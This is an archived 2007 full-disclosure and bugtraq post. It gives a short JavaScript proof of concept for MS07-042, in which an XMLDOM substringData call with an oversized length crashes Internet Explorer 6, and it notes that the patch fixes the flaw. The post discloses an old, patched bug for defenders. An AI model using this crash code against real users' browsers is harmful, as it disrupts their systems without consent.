[<prev] [next>] [day] [month] [year] [list]
Message-ID: <46C4199A.9020500@scanit.be>
Date: Thu, 16 Aug 2007 11:32:10 +0200
From: Alla Bezroutchko <alla@...nit.be>
To: full-disclosure@...ts.grok.org.uk, bugtraq@...urityfocus.com
Subject: MS07-042 XMLDOM substringData() PoC
This bit of JavaScript kills IE 6 on Windows 2000 and Windows XP SP2
var xmlDoc = new ActiveXObject("Microsoft.XMLDOM");
xmlDoc.loadXML("<dummy></dummy>");
var txt = xmlDoc.createTextNode("huh");
var out = txt.substringData(1,0x7fffffff);
Installing the patch from MS07-042 fixes it.
Cheers,
Alla Bezroutchko
Scanit - http://www.scanit.be/
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists